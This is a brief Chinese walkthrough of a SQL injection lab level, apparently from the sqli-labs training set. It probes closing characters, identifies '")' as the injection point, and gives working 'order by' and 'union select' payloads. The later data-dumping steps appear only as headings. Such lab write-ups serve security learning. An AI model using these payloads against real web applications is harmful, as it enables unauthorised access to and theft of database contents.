题目:GET - Error based - Double Quotes - String
基于错误的GET双引号字符型注入
可能的注入点(不全)
'
"
)
')
")
观察页面
?id=1
有正常回显
判断注入点
?id=1'
正常回显,说明注入点不在单引号的闭合上
尝试朝前括号
?id=1)
正常回显,说明注入点不在括号上
尝试双引号
?id=1"
出现报错,可以看到这里报错的地方还有一个括号,说明这不是单纯的用双引号进行闭合,还要用到括号
测试
?id=1" )and 1=1 --+
成功得到该注入点为") (* ̄︶ ̄)
判断字段数
?id=1" )order by 3 --+
判断回显位
?id=-1" )union select 1,2,3 --+
爆数据库名
爆数据库中的数据表名
爆数据表中的数据列名
爆数据库的所有内容
